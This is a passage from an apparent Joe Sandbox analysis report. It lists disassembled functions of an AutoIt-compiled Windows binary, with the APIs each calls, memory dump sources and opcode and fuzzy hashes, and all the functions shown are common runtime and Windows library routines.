                                                                                                                              • Instruction Fuzzy Hash: BF115E75500109AFCB05FBA0DD56DEE77BAAF24314B108059F506A71A2DB30EE44CB51
                                                                                                                              Function 0019010A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001945EC: __FF_MSGBANNER.LIBCMT ref: 00194603
                                                                                                                                • Part of subcall function 001945EC: __NMSG_WRITE.LIBCMT ref: 0019460A
                                                                                                                                • Part of subcall function 001945EC: RtlAllocateHeap.NTDLL(013D0000,00000000,00000001), ref: 0019462F
                                                                                                                              • std::exception::exception.LIBCMT ref: 0019013E
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00190153
                                                                                                                                • Part of subcall function 00197495: RaiseException.KERNEL32(?,?,0017125D,00226598,?,?,?,00190158,0017125D,00226598,?,00000001), ref: 001974E6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                              • String ID: bad allocation
                                                                                                                              • API String ID: 3902256705-2104205924
                                                                                                                              • Opcode ID: a265028b257b64002229603ffeaf546f4df44d576a2477b37617dc861a7d5730
                                                                                                                              • Instruction ID: 7bb31dbf9fe7f056f7949f44f1cf116e79b25b103e81d2ba818cae918394b616
                                                                                                                              • Opcode Fuzzy Hash: a265028b257b64002229603ffeaf546f4df44d576a2477b37617dc861a7d5730
                                                                                                                              • Instruction Fuzzy Hash: 27F0C83910421DBBCF16ABE8ED029EE77EDBF18350F104425F905A21C1DBB0D69096A5
                                                                                                                              Function 0017C610 Relevance: 4.6, APIs: 3, Instructions: 125COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0017C00E,?,?,?,?,00000010), ref: 0017C627
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 0017C65F
                                                                                                                              • _memmove.LIBCMT ref: 0017C697
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide$_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3033907384-0
                                                                                                                              • Opcode ID: 10faa98a1e5bab74255df5b530b659bb96dd0ae396224f0080d7894f33d3cc1e
                                                                                                                              • Instruction ID: 5e847c10d10af33e42e58475457c4720a8a974c0c6f0c8b74f01d20af9dfbbef
                                                                                                                              • Opcode Fuzzy Hash: 10faa98a1e5bab74255df5b530b659bb96dd0ae396224f0080d7894f33d3cc1e
                                                                                                                              • Instruction Fuzzy Hash: B531D9B26012016FDB249F74D846B2BB7E9EF58310F10853DF95E87290EB31E950C791
                                                                                                                              Function 00173A67 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SHGetMalloc.SHELL32(00173C31), ref: 00173A7D
                                                                                                                              • SHGetPathFromIDListW.SHELL32(?,?), ref: 00173AD2
                                                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 00173A8F
                                                                                                                                • Part of subcall function 00173B1E: _wcsncpy.LIBCMT ref: 00173B32
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3981382179-0
                                                                                                                              • Opcode ID: 1a7bcbfc74ea3cbcdd6615ba2f566d02642832a858514cf0e864a7fe665d67ed
                                                                                                                              • Instruction ID: 9855daa15f0e73cc224b4bcd16d9c77d566be3222f0c3db6350851e6cd4c0c60
                                                                                                                              • Opcode Fuzzy Hash: 1a7bcbfc74ea3cbcdd6615ba2f566d02642832a858514cf0e864a7fe665d67ed
                                                                                                                              • Instruction Fuzzy Hash: DD216F76B00118ABCB14DF95DC89DEEB7BEEF88710B1080A8F50AD7251DB309E46DB94
                                                                                                                              Function 001945EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __FF_MSGBANNER.LIBCMT ref: 00194603
                                                                                                                                • Part of subcall function 00198E52: __NMSG_WRITE.LIBCMT ref: 00198E79
                                                                                                                                • Part of subcall function 00198E52: __NMSG_WRITE.LIBCMT ref: 00198E83
                                                                                                                              • __NMSG_WRITE.LIBCMT ref: 0019460A
                                                                                                                                • Part of subcall function 00198EB2: GetModuleFileNameW.KERNEL32(00000000,00230312,00000104,?,00000001,00190127), ref: 00198F44
                                                                                                                                • Part of subcall function 00198EB2: ___crtMessageBoxW.LIBCMT ref: 00198FF2
                                                                                                                                • Part of subcall function 00191D65: ___crtCorExitProcess.LIBCMT ref: 00191D6B
                                                                                                                                • Part of subcall function 00191D65: ExitProcess.KERNEL32 ref: 00191D74
                                                                                                                                • Part of subcall function 0019889E: __getptd_noexit.LIBCMT ref: 0019889E
                                                                                                                              • RtlAllocateHeap.NTDLL(013D0000,00000000,00000001), ref: 0019462F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1372826849-0
                                                                                                                              • Opcode ID: db1054a2c66d6cc944f92c75c3bc1c5f1833530695532376719f6dd0aec342c9
                                                                                                                              • Instruction ID: 1f9cccc6a61774632ff0803fe1f90abae71cce3df6593a3b566e0a4bff96671f
                                                                                                                              • Opcode Fuzzy Hash: db1054a2c66d6cc944f92c75c3bc1c5f1833530695532376719f6dd0aec342c9
                                                                                                                              • Instruction Fuzzy Hash: 4B01B171601301ABEE243B65BC56F3A3348AF93B61F12052AF605DB5C2DFB0DC428674
                                                                                                                              Function 0017E60E Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • TranslateMessage.USER32(?), ref: 0017E646
                                                                                                                              • DispatchMessageW.USER32(?), ref: 0017E651
                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0017E664
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$DispatchPeekTranslate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4217535847-0
                                                                                                                              • Opcode ID: f69543b473a8a7862ce08ea8c8c0a9be3d1510aee1d3e0202799ee8af34472e7
                                                                                                                              • Instruction ID: e446c242dbafaea819187fc960af640855c36fbc252021ed6eb0b18dfc838269
                                                                                                                              • Opcode Fuzzy Hash: f69543b473a8a7862ce08ea8c8c0a9be3d1510aee1d3e0202799ee8af34472e7
                                                                                                                              • Instruction Fuzzy Hash: 0FF01C726143459BEB10EBE18C45B7BB7EDBB98744F144C3DB645C3080EBB0D5058B22
                                                                                                                              Function 001BC450 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _free.LIBCMT ref: 001BC45E
                                                                                                                                • Part of subcall function 001928CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00198715,00000000,001988A3,00194673,?), ref: 001928DE
                                                                                                                                • Part of subcall function 001928CA: GetLastError.KERNEL32(00000000,?,00198715,00000000,001988A3,00194673,?), ref: 001928F0
                                                                                                                              • _free.LIBCMT ref: 001BC46F
                                                                                                                              • _free.LIBCMT ref: 001BC481
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 776569668-0
                                                                                                                              • Opcode ID: 409dc5471866d52cb660d3acacbc6baa69eb1666097d1b0fc545827c793d8a90
                                                                                                                              • Instruction ID: a7c1300d2f0e738669cb1f527616691746077fa89fc5583666cec89b07c2ea5b
                                                                                                                              • Opcode Fuzzy Hash: 409dc5471866d52cb660d3acacbc6baa69eb1666097d1b0fc545827c793d8a90
                                                                                                                              • Instruction Fuzzy Hash: 56E017A1A00701B7CF24EE79A854BF363CC6F04761B14486EF459D7182DF28E94081B8
                                                                                                                              Function 0018058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: CALL
                                                                                                                              • API String ID: 0-4196123274
                                                                                                                              • Opcode ID: f37b25cc01e913222332a527b83b91c95495eb49d02d552fe1f9c4f1440c39c0
                                                                                                                              • Instruction ID: 32b1801e2a1e31eeaa9264112608833a4702e5064d52d32c92249a25476d29ab
                                                                                                                              • Opcode Fuzzy Hash: f37b25cc01e913222332a527b83b91c95495eb49d02d552fe1f9c4f1440c39c0
                                                                                                                              • Instruction Fuzzy Hash: 77229C70508344DFD769EF24C490A2AB7F1BF99304F25896DE89A8B261D731E989CF42
                                                                                                                              Function 0017131C Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001716F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00171751
                                                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0017159B
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00171612
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 001E58F7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 458326420-0
                                                                                                                              • Opcode ID: 802945bf33e581ca3ae6d8451eaf29f81b0a18da0144b61118ed473ea1193be9
                                                                                                                              • Instruction ID: 55c47edacec63336cc8d90864c1486aa86a974b4ebc8211d6145eb908fa416d3
                                                                                                                              • Opcode Fuzzy Hash: 802945bf33e581ca3ae6d8451eaf29f81b0a18da0144b61118ed473ea1193be9
                                                                                                                              • Instruction Fuzzy Hash: 9071CDB4A113459FC314DFAAF99A894BBF9FB68344798816ED20A87372DB704474CF11
                                                                                                                              Function 00174010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID: EA06
                                                                                                                              • API String ID: 4104443479-3962188686
                                                                                                                              • Opcode ID: a396ab874808eb49e94dd7e8e8bb057adb28b8c1efffa0580f07db0fec9860df
                                                                                                                              • Instruction ID: 3c6365343e1080e3cb4fd6573d42ec2a3ce774e3b967383942fe60bb8c5d2d25
                                                                                                                              • Opcode Fuzzy Hash: a396ab874808eb49e94dd7e8e8bb057adb28b8c1efffa0580f07db0fec9860df
                                                                                                                              • Instruction Fuzzy Hash: FE418021A042589BDF15AB548C517FF7FB29B25300FA9C465F98EDB183C7219DD087A1
                                                                                                                              Function 001C013F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscmp
                                                                                                                              • String ID: 0.0.0.0
                                                                                                                              • API String ID: 856254489-3771769585
                                                                                                                              • Opcode ID: 292f9f1d6e57a062b8d1b25de67373db96174985d30af16ebb4142cebe5226eb
                                                                                                                              • Instruction ID: 57643a27c2a7bdb2cdf06d06d4e8debe47fce4d8d4cfb029907e158230d6f229
                                                                                                                              • Opcode Fuzzy Hash: 292f9f1d6e57a062b8d1b25de67373db96174985d30af16ebb4142cebe5226eb
                                                                                                                              • Instruction Fuzzy Hash: 7911E335640204EFCB05EB54D981E99F3F9AFA8710B18805DF509AF392DB70ED818BA0
                                                                                                                              Function 00173BFF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 001E3CF1
                                                                                                                                • Part of subcall function 001731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001731DA
                                                                                                                                • Part of subcall function 00173A67: SHGetMalloc.SHELL32(00173C31), ref: 00173A7D
                                                                                                                                • Part of subcall function 00173A67: SHGetDesktopFolder.SHELL32(?), ref: 00173A8F
                                                                                                                                • Part of subcall function 00173A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00173AD2
                                                                                                                                • Part of subcall function 00173B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,002322E8,?), ref: 00173B65
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                                                                                              • String ID: X
                                                                                                                              • API String ID: 2727075218-3081909835
                                                                                                                              • Opcode ID: 0135736bb5e4e6fdf4aeb424efa57fa39d6f2904aeb3c0d8643328e6f16d4786
                                                                                                                              • Instruction ID: 50eb36cf4e41382787fa7f2721d7394dcdea25b5913b396120567fa298ee7c7f
                                                                                                                              • Opcode Fuzzy Hash: 0135736bb5e4e6fdf4aeb424efa57fa39d6f2904aeb3c0d8643328e6f16d4786
                                                                                                                              • Instruction Fuzzy Hash: 9B11A3B1A10298ABCF05DFD4D8056EEBBF9AF55704F00800AF915BB241CBB44A49DBA1
                                                                                                                              Function 001B30AC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID: "#
                                                                                                                              • API String ID: 4104443479-3789857742
                                                                                                                              • Opcode ID: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                                                                                                                              • Instruction ID: 02b2664ac8c5a950c5ce14b467fd5e3bb9e6f559147900f4622bee95604e66b9
                                                                                                                              • Opcode Fuzzy Hash: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                                                                                                                              • Instruction Fuzzy Hash: 86018136301225ABCB28DF2DD8919AB77A9EFC5364714842EF90ACB245D731E916C7A0
                                                                                                                              Function 001734C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 001E34AA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryLoad
                                                                                                                              • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                              • API String ID: 1029625771-2684727018
                                                                                                                              • Opcode ID: 549dabd8b5d86e081f61fd3a2b55c3740394bd74e812d48c27a6252036a37a13
                                                                                                                              • Instruction ID: 18c651ad585fa3ffcea50302c7904938d7d8f6e0783aa94be1509b09a9d78622
                                                                                                                              • Opcode Fuzzy Hash: 549dabd8b5d86e081f61fd3a2b55c3740394bd74e812d48c27a6252036a37a13
                                                                                                                              • Instruction Fuzzy Hash: 3AF06871D4420DBE8F15EFB0C8518FFB7B8AA20310F10C526E83692082EB349B09DB21
                                                                                                                              Function 001B6852 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19fileCOMMON
                                                                                                                              Download Yara Rule
